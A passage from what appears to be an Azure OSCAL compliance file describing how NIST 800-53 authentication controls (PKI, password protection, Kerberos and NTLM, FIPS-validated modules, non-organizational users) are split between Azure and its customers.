Authority (CA) and Registration Authority (RA) and provides directory services to manage keys and certificates. The certificates are signed by an internal Microsoft CA and are validated against that CA's public key. Azure also checks certificates against certificate revocation lists. 
PKI certificates are stored within smart cards and authorized access to the corresponding private keys is enforced. Access to the certificate stored on the card is restricted by a PIN requirement. The Azure PKI intermediate CA servers are members of only internally rooted PKI chains, permitting the issuance of certificates to users and computers within the Azure AD environments. Azure validates the certificates by constructing a certification path with status information to an accepted trust anchor."},{"uuid":"a8ea35f3-860b-4d2e-b3bc-ddf8c03b9b49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-039"}],"description":"Azure domain controllers cache revocation data and make it available to Azure assets if the primary revocation lists are unavailable."}],"responsibilities":[{"uuid":"58e7ecdf-5868-4b73-8446-3237cddec4da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-038"}],"description":"The customer is responsible for employing PKI-based authentication within customer-deployed resources to validate certifications by constructing and verifying a certification path to an accepted trust anchor, including checking certificate status information. It is the responsibility of the user to protect their private key through limited instances of the private key and encryption of the private key. Azure provides customers the capability to access their accounts programmatically through the SMAPI, which relies on public/private key pairs. It is the customer's responsibility to properly set up and configure the key pairs. It is also the responsibility of the customer to manage private keys and revoke any certificates that have been compromised or expired. When using the SMAPI interface, authentication does not use the federated identity. Instead, the customer should generate a public/private key pair and self-signed certificate and register that certificate using the portal. 
The certificate is then used as a client certificate in the RPC over HTTPS connection to SMAPI. The customer is responsible for protecting the generated private keys.","provided-uuid":"09161c7e-d4d5-4efe-826f-8f73fc6eeef2"},{"uuid":"680b76e5-35a3-4ddf-b7ac-4acfa434458a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-039"}],"description":"The customer is responsible for employing PKI-based authentication within customer-deployed resources and implementing a local cache of private key data to support path discovery and validation when unable to access this information via the network.","provided-uuid":"a8ea35f3-860b-4d2e-b3bc-ddf8c03b9b49"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b02c1a20-5a4a-4cc8-95ff-adbf6b460852","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.6","statements":[{"uuid":"39aea818-ae71-4226-99b9-8cad4ed107cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.6_smt","by-components":[{"uuid":"3211b883-c4b4-4cbd-b97a-b26e6e4f0397","export":{"provided":[{"uuid":"dad806d6-a595-4fa2-b878-cca5c86ee833","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-040"}],"description":"All passwords used to access the Microsoft corporate network or business information must be considered and handled as \"information as per the InfoSec #2.0 Information Classification and Handling 
Standard.\" Core Services Engineering and Operations (CSEO) is responsible for protecting Microsoft corporate network authenticators.\n\nPer corporate security policy, usernames and passwords are never stored or transmitted in the clear or any unencrypted format. Passwords must not be shared or revealed to anyone other than the authorized user. Additionally, passwords must be promptly changed if they are suspected of being known by unauthorized individuals.\n\nPer Azure policy, cryptographic protection is applied to passwords when transmitted and stored, and passwords are never transmitted in any unencrypted format natively within the Azure environment.\n\nCryptographic certificates are stored in an approved secret management store. Information stored in the approved secret management stores is encrypted, and access occurs over an encrypted channel.\n\nAuthentication credentials, such as username/password pairs, are considered High Business Impact (HBI) data and are required to be protected based upon their classification. Encryption must be used when storing or transmitting passwords, username/password files, or authentication tokens, in accordance with the Azure asset protection standard. Azure uses the following authentication protocols with commensurate encryption.\n\nKerberos V5\n\nKerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. The Kerberos protocol uses strong cryptography so that a client can prove its identity to a server (and vice versa) across an insecure network connection.\n\nThe Kerberos V5 protocol can use both symmetric and asymmetric encryption. Because most Kerberos encryption methods are based on keys that can be created only by the KDC and the client, or by the KDC and a network service, the Kerberos V5 protocol is said to use symmetric encryption. 
That is, the same key is used to encrypt and decrypt messages.\n\nMicrosoft's implementation of the Kerberos protocol can also make limited use of asymmetric encryption. A private/public key pair can be used to encrypt or decrypt initial authentication messages from a network client or a network service, as in the case of public key certificates on smart cards.\n\nNTLMv2\n\nNTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a username, and a one-way hash of the user's password. NTLM uses an encrypted challenge/response protocol to authenticate a user without sending the user's password over the wire. Instead, the system requesting authentication must perform a calculation that proves it has access to the secured NTLM credentials.\n\nInteractive NTLM authentication over a network typically involves two systems: a client system, where the user is requesting authentication, and a domain controller, where information related to the user's password is kept. Noninteractive authentication, which may be required to permit an already logged-on user to access a resource such as a server application, typically involves three systems: a client, a server, and a domain controller that does the authentication calculations on behalf of the server.\n\nThe following steps present an outline of NTLM noninteractive authentication. The first step provides the user's NTLM credentials and occurs only as part of the interactive authentication (logon) process.\n\n1. (Interactive authentication only) A user accesses a client computer and provides a domain name, username, and password. The client computes a cryptographic hash of the password and discards the actual password.\n2. The client sends the username to the server.\n3. The server generates a 16-byte random number, called a challenge or nonce, and sends it to the client.\n4. 
The client encrypts this challenge with the hash of the user's password and returns the result to the server. This is called the response.\n5. The server sends the following items to the domain controller: the username, the challenge sent to the client, and the response received from the client.\n6. The domain controller uses the username to retrieve the hash of the user's password from the Security Account Manager database. It uses this password hash to encrypt the challenge.\n7. The domain controller compares the encrypted challenge it computed (in step 6) to the response computed by the client (in step 4). If they are identical, authentication is successful."}],"responsibilities":[{"uuid":"dd6f1945-b873-42b0-a24a-85a22c61306a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-040"}],"description":"The customer agency is responsible for ensuring their authorized users protect all provided authenticators, including passwords. Customer agency users should protect authenticators in accordance with the classification or sensitivity of the information accessed.","provided-uuid":"dad806d6-a595-4fa2-b878-cca5c86ee833"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2f8130fd-4cb4-46e5-8182-de7eadeabb59","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.7","statements":[{"uuid":"7f8f0c3e-a7ba-4caa-84a5-04c12ffe338f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.7_smt","by-components":[{"uuid":"ee2f02ab-9de6-483a-81dd-6c15cf139bcd","export":{"provided":[{"uuid":"26c392ca-c49d-4af4-ab64-2053bf7cbf94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-041"}],"description":"Azure explicitly prohibits the use of unencrypted static authenticators embedded in applications, access scripts, or function keys. Any script that uses an authenticator makes a call to a secrets management database prior to each use. Access to the secrets management database is audited, which allows detection of violations of this prohibition if a service account is used to access a system without a corresponding call to the secrets management database.\n\nAzure service teams perform security testing for Azure services through the Security Development Lifecycle (SDL) process that is followed for all engineering and development projects. As part of the security testing that occurs during multiple phases of the SDL process, Azure teams ensure there are no unencrypted authenticators embedded in the applications, access scripts or function keys. 
CredScan runs on all official builds in all build pipelines, either breaking the build to prevent production use or creating work items assigned to the Azure service team for remediation."}],"responsibilities":[{"uuid":"c555cf55-cfa3-4d2d-9365-c4205c463269","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-041"}],"description":"The customer is responsible for ensuring there are no unencrypted static authenticators within customer-deployed resources.","provided-uuid":"26c392ca-c49d-4af4-ab64-2053bf7cbf94"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"43b1f707-3592-4543-b089-93d9fd2711a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.8","statements":[{"uuid":"a9b26b35-5794-47ab-8290-b437f2993b00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.8_smt","by-components":[{"uuid":"0c6e4ea2-a06e-4140-866c-c4cfd50b0314","export":{"provided":[{"uuid":"bf9ab4ea-d138-4ab3-82d7-e7891219b528","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-042"}],"description":"Azure uses smart cards that differentiate between different AD domains. This ensures that personnel use different authenticators when accessing the two systems and prevents an attacker from gaining access to both systems if one set of authenticators is compromised. 
In addition, Azure uses single sign-on, encrypts AAD passwords that exist in the back end, stores in Azure Key Vault the passwords used where smart cards are not possible, and encrypts all traffic with HTTPS, mitigating the risk of compromise."}],"responsibilities":[{"uuid":"5802c676-0130-48f2-9e50-beda85e7b871","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-042"}],"description":"The customer is responsible for managing the risk imposed by users with multiple accounts on customer-deployed resources (e.g., having different authenticators on all systems, employing some form of single sign-on mechanism, or including some form of one-time passwords on all systems).","provided-uuid":"bf9ab4ea-d138-4ab3-82d7-e7891219b528"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f7525387-899b-44d0-8829-d813b8bb1931","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.13","statements":[{"uuid":"575be83c-992c-4134-9abb-dd1ff5891cae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-043"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-5.13_smt","by-components":[{"uuid":"da849074-e6d3-413a-8458-bcc45fb6467e","export":{"provided":[{"uuid":"a09f2e71-45f1-4c1b-b3b4-a7265d52f6de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-043"}],"description":"Azure does not allow the use of cached authenticators within the Azure environment. 
Once a session has closed or the user has logged off, the user must re-authenticate to the system."}],"responsibilities":[{"uuid":"ebfef233-1c4f-4834-9def-75298a3d16d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-043"}],"description":"The customer is responsible for enforcing the expiration of cached authenticators.","provided-uuid":"a09f2e71-45f1-4c1b-b3b4-a7265d52f6de"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1657f7ac-6ce5-4b11-ba8d-d1cd4146816c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-6","statements":[{"uuid":"052c70ad-c15e-4846-b424-fc452862e857","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-6_smt","by-components":[{"uuid":"e54497eb-cba8-4808-9a3d-4a11addf9240","export":{"provided":[{"uuid":"632ba0da-9446-4459-be1b-9d5dffd75995","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-044"}],"description":"Azure protects authenticator feedback using the built-in operating system security controls that protect passwords when authenticating to system components. Additionally, SSH and Remote Desktop Protocol (RDP) are used for authentication into the Azure production environment and provide obfuscation of credentials. No feedback is provided during the authentication process that could lead to potential exploitation by unauthorized users. 
Authenticators are displayed as asterisks so that the user is aware an authenticator is being entered, but the authenticator cannot be viewed."}],"responsibilities":[{"uuid":"4be60446-6731-4a72-ab23-73920628822b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-044"}],"description":"The customer is responsible for obscuring authentication feedback information during the authentication process for any customer-deployed resources.","provided-uuid":"632ba0da-9446-4459-be1b-9d5dffd75995"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bd4456cc-f3b5-4b0b-889a-669666c3f27e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-7","statements":[{"uuid":"e9abdb37-9e3e-4507-b58a-f419e1fb8d35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-7_smt","by-components":[{"uuid":"1fcfaf03-bdff-4738-a92e-9c1eb1defff7","export":{"provided":[{"uuid":"5796f0a5-0483-4208-a41e-7b563ec9d6ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-045"}],"description":"Azure implements encryption mechanisms on all internal and customer communications using cryptographic certificates issued by Certificate Management Tool which are anchored to the root Certificate Authority (CA). To request a cryptographic certificate, the Azure user interacts with an approved secret management store. 
The secret management store then interacts with Certificate Management Tool to process the request. The request is routed to the user's manager for approval. Once the certificate is issued, the user uses multifactor authentication to access Azure assets to install the certificate. This process meets the requirements of applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance for authentication to a cryptographic module.\n\nEncryption mechanisms and techniques used by Azure follow the requirements and restrictions outlined in the Microsoft Cryptographic Standards for SDL Covered Products. These standards are in line with the use of only FIPS 140-2 compliant ciphers. Service data and information are handled in accordance with the requirements and restrictions specified in the Asset Classification Standard and the Asset Protection Standard when cryptography is used. The Asset Classification Standard and Asset Protection Standard establish the mandatory minimum requirements for Microsoft's online services' asset ownership, classification, and protection. Azure utilizes encryption for user authentication through Active Directory. 
The following FIPS-validated cryptographic modules (by certificate number) are supported:\n\n* 3690 - Virtual TPM\n* 3651 - Secure Kernel Code Integrity\n* 3644 - Code Integrity\n* 3630 - Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll)\n* 3615 - Windows OS Loader\n* 3544 - Cryptographic Primitives Library\n* 3527 - Kernel Mode Cryptographic Primitives Library\n* 3513 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016\n* 3510 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016\n* 3502 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016\n* 3501 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016\n* 3487 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016\n* 3480 - Windows OS Loader\n* 3469 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub\n* 3464 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise\n* 3451 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, 
Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 3447 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 3197 - Cryptographic Primitives Library_x000D_ * 3196 - Kernel Mode Cryptographic Primitives Library_x000D_ * 3195 - Code Integrity_x000D_ * 3194 - Windows OS Loader_x000D_ * 3096 - Secure Kernel Code Integrity_x000D_ * 3095 - Cryptographic Primitives Library_x000D_ * 3094 - Kernel Mode Cryptographic Primitives Library_x000D_ * 3093 - Code Integrity_x000D_ * 3092 - BitLocker Dump Filter_x000D_ * 3091 - Windows Resume_x000D_ * 3090 - Windows OS Loader_x000D_ * 3089 - Boot Manager_x000D_ * 2938 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2937 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2936 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2935 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2934 - BitLocker® Dump Filter (dumpfve.sys) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2933 - BitLocker® Windows Resume (winresume) in Microsoft 
Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2932 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2931 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2703 - BitLocker® Dump Filter (dumpfve.sys) in Microsoft Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2702 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise_x000D_ * 2701 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2700 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2607 - Secure Kernel Code Integrity (skci.dll) in Microsoft Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2606 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2605 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2604 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2603 - BitLocker® Dump 
Filter (dumpfve.sys) in Microsoft Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2602 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2601 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2600 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ _x000D_ Network Devices_x000D_ _x000D_ AES-256 bit encrypted SSH is used for network device authentication using FIPS 140-2 approved algorithms:_x000D_ _x000D_ * SecureCRT® 5.1-6.1 (FIPS Validation Certificate 608)_x000D_ * SecureCRT 6.2-7.2 (FIPS Validation Certificate 1058)_x000D_ * SecureCRT 7.3 (FIPS Validation Certificate 0039)_x000D_ * SecureCRT 8.0 and later (FIPS Validation Certificate 0048)_x000D_ _x000D_"}],"responsibilities":[{"uuid":"4d512513-9625-44b4-8bff-0d61da8b7574","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-045"}],"description":"The customer is responsible for implementing mechanisms for authentication to a cryptographic module (e.g., configuring web applications). Customers are responsible for configuring their web browsers, mobile devices, etc., to enable communications through FIPS 140-2 compliant encryption. Customers who enforce FDCC/USGCB settings on their computers or enablers (for REST API) will achieve FIPS 140-2 encryption for data transmitted to Microsoft Azure between their enablers (for REST API) and the Azure Web services interface. Strong encryption with FIPS-approved ciphers is still possible if workstations are not operating in FIPS mode. Microsoft Azure SDK extends the core .NET libraries to allow developers to integrate the .NET Cryptographic Service Providers (CSPs) within Microsoft Azure. 
Developers familiar with .NET CSPs can easily implement encryption, hashing, and key management functionality for stored or transmitted data.","provided-uuid":"5796f0a5-0483-4208-a41e-7b563ec9d6ab"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"67943b7e-bbfc-4150-9445-9d6b644d99e2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8","statements":[{"uuid":"f1247437-ea07-4fd7-90cb-5e80575fbef0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-046"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8_smt","by-components":[{"uuid":"c732beb0-e200-4495-8390-1ff29fcdc745","export":{"provided":[{"uuid":"c0425c7e-9fba-489b-9a63-9e2d88bdfcca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-046"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems."}],"responsibilities":[{"uuid":"e0554abf-c1db-433e-814d-25eafa2e5561","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-046"}],"description":"The customer is responsible for identifying and authenticating non-organizational users accessing customer-deployed resources.","provided-uuid":"c0425c7e-9fba-489b-9a63-9e2d88bdfcca"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"719f81da-5ae2-40d8-959d-9b46dc07bee3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8.1","statements":[{"uuid":"07ee4729-af33-419e-aa1e-18bf2b6f06e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-047"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8.1_smt","by-components":[{"uuid":"bd2bd5eb-384a-428a-a0ed-276b608efebf","export":{"provided":[{"uuid":"6fc5765f-b1a2-4297-9948-f90e78d04db5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-047"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems. Azure does not utilize Personal Identity Verification (PIV) credentials for internal personnel because PIV cards are not available to Azure."}],"responsibilities":[{"uuid":"ca87c2b3-6a5d-481a-956c-dc997056e1f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-047"}],"description":"The customer is responsible for accepting and verifying Personal Identity Verification (PIV) credentials issued by other federal agencies. 
Note: if the customer does not deploy PIV credentials, this control is not applicable.","provided-uuid":"6fc5765f-b1a2-4297-9948-f90e78d04db5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e500c2b5-2c30-4a01-81bf-4d1b7aee8861","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8.2","statements":[{"uuid":"8f0dd8c4-bf96-46e2-a78c-a9ebad5ab339","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-048"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8.2_smt","by-components":[{"uuid":"ca5a989a-bf75-45fc-8b8f-78bb4a0300e4","export":{"provided":[{"uuid":"442279db-9c24-4c6a-ba06-cef82a6fbe8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-048"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems. Azure does not accept or process any third-party credentials."}],"responsibilities":[{"uuid":"e3ef21b9-9786-4e71-84bc-2b727a6a2672","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-048"}],"description":"The customer is responsible for only accepting third-party credentials that have been approved by the Federal Identity, Credential, and Access Management (FICAM) Trust Framework Solutions initiative. 
Note: if the customer's deployed resources do not allow third-party credentials, this control is not applicable.","provided-uuid":"442279db-9c24-4c6a-ba06-cef82a6fbe8e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bb9bf700-70fb-451a-b79c-d417b9c6a1bf","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8.4","statements":[{"uuid":"961dfcb9-7856-441d-892e-a9c4f9172620","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-049"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8.4_smt","by-components":[{"uuid":"40bd5362-b19a-49ad-98cf-33d8fd3e95d0","export":{"provided":[{"uuid":"4e33db7f-8c64-430a-91fc-99b60a21dd27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-049"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems. Azure does not accept or process any third-party 